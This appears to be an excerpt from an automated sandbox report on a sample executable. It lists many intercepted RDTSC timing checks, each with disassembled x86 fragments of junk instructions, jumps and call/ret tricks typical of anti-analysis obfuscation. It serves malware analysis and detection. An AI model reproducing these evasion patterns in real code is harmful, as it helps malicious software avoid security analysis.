Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E2804 second address: 5E2815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 jc 00007F6E644F752Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F3809 second address: 5F380E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F380E second address: 5F381E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6E644F7526h 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F3DAB second address: 5F3DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F5748 second address: 5F574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F574C second address: 5F5795 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F6E64DC24B8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jg 00007F6E64DC24BEh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push eax 0x00000020 jns 00007F6E64DC24B6h 0x00000026 pop eax 0x00000027 pop eax 0x00000028 mov eax, dword ptr [eax] 0x0000002a push edx 0x0000002b jnl 00007F6E64DC24B8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 jc 00007F6E64DC24CAh 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F5795 second address: 5F57CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Ch 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [ebp+122D3240h], edx 0x00000011 lea ebx, dword ptr [ebp+124555A9h] 0x00000017 mov ecx, dword ptr [ebp+122D31BCh] 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F6E644F752Ch 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F57CC second address: 5F57D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F57D2 second address: 5F57D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F57D7 second address: 5F57E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F57E1 second address: 5F57E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F5883 second address: 5F5896 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F6E64DC24C4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F5896 second address: 5F589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F589A second address: 5F58CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 mov dword ptr [ebp+122D1BE4h], edx 0x0000000e sub dword ptr [ebp+122D335Fh], ecx 0x00000014 popad 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2F38h], ecx 0x0000001d mov edx, 2209ADE5h 0x00000022 push 0F8A28B4h 0x00000027 jl 00007F6E64DC24C0h 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F58CB second address: 5F596C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 0F8A2834h 0x0000000d mov edx, 5E8FB8F3h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F6E644F7528h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D2A63h] 0x00000034 mov esi, dword ptr [ebp+122D2F51h] 0x0000003a push 00000000h 0x0000003c stc 0x0000003d push 00000003h 0x0000003f call 00007F6E644F752Ch 0x00000044 mov di, dx 0x00000047 pop ecx 0x00000048 jmp 00007F6E644F7532h 0x0000004d push D3AA6C5Bh 0x00000052 jbe 00007F6E644F752Eh 0x00000058 xor dword ptr [esp], 13AA6C5Bh 0x0000005f or dword ptr [ebp+122D24F4h], eax 0x00000065 lea ebx, dword ptr [ebp+124555B2h] 0x0000006b sub dword ptr [ebp+122D3838h], edi 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jns 00007F6E644F7528h 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F596C second address: 5F5971 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F5AFB second address: 5F5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F5AFF second address: 5F5B09 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF0C7 second address: 5DF105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6E644F7535h 0x0000000b ja 00007F6E644F7526h 0x00000011 popad 0x00000012 push edx 0x00000013 jne 00007F6E644F7526h 0x00000019 pop edx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6E644F7530h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF105 second address: 5DF11D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E64DC24B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F6E64DC24B8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615714 second address: 61571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6158A8 second address: 6158C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F6E64DC24B6h 0x00000012 jp 00007F6E64DC24B6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6158C0 second address: 6158CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E644F7526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615A20 second address: 615A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615D82 second address: 615D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615D87 second address: 615DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F6E64DC24C1h 0x0000000c popad 0x0000000d jmp 00007F6E64DC24C2h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jo 00007F6E64DC24E1h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615DBE second address: 615DE1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E644F7526h 0x00000008 jmp 00007F6E644F7531h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F6E644F752Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615F37 second address: 615F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615F3B second address: 615F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E644F7537h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 615F60 second address: 615F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6160D0 second address: 6160D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6160D4 second address: 6160EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6162B2 second address: 6162B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6167F5 second address: 616824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E64DC24C8h 0x00000011 jmp 00007F6E64DC24BBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61696A second address: 616970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 616970 second address: 616995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F6E64DC24C9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 616995 second address: 61699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60DB54 second address: 60DB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60DB58 second address: 60DB72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7536h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60DB72 second address: 60DB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 616B07 second address: 616B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F6E644F752Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 616B1D second address: 616B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 616B23 second address: 616B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 616B29 second address: 616B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6170BD second address: 6170D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6170D2 second address: 6170D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6170D6 second address: 6170E0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E644F7526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6170E0 second address: 6170E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6173C4 second address: 6173C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6173C8 second address: 6173D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6173D5 second address: 6173DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6173DD second address: 6173E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61751D second address: 617529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6E644F7526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 617529 second address: 617533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 617533 second address: 61759D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F6E644F7526h 0x00000016 jmp 00007F6E644F7538h 0x0000001b popad 0x0000001c jl 00007F6E644F7546h 0x00000022 jmp 00007F6E644F7533h 0x00000027 jmp 00007F6E644F752Dh 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jnc 00007F6E644F7528h 0x00000035 jl 00007F6E644F752Ah 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60DB26 second address: 60DB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60DB2F second address: 60DB54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6E644F7537h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61E8AC second address: 61E8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61E8BF second address: 61E8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61E8C4 second address: 61E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F6E64DC24BEh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61E8D5 second address: 61E8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61E8E4 second address: 61E8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F6E64DC24BCh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61E8FE second address: 61E916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F6E644F7526h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61D90D second address: 61D911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E77F9 second address: 5E7803 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 623AFA second address: 623B04 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 623B04 second address: 623B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6E644F7526h 0x00000009 je 00007F6E644F7526h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F6E644F7526h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 623DA3 second address: 623DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 623EA7 second address: 623EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6245F9 second address: 6245FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6246EB second address: 6246F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6246F0 second address: 6246FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6E64DC24BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624992 second address: 624998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6250EC second address: 6250F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62593A second address: 62593E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62624B second address: 62624F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6270D1 second address: 6270D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 627AFF second address: 627B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 627E09 second address: 627E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6270D7 second address: 6270DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 627B05 second address: 627B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628913 second address: 628949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D27EBh] 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D28FBh] 0x00000018 push 00000000h 0x0000001a or si, 8900h 0x0000001f mov esi, dword ptr [ebp+122D18C5h] 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6290D8 second address: 6290DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6290DD second address: 6290FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F6E64DC24B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jp 00007F6E64DC24C2h 0x00000015 js 00007F6E64DC24BCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA126 second address: 5DA143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7539h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA143 second address: 5DA14D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA14D second address: 5DA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E5F0 second address: 62E658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2557h], edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6E64DC24B8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov bl, dh 0x0000002d movsx edi, si 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F6E64DC24B8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c adc ebx, 00CD023Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62F540 second address: 62F545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
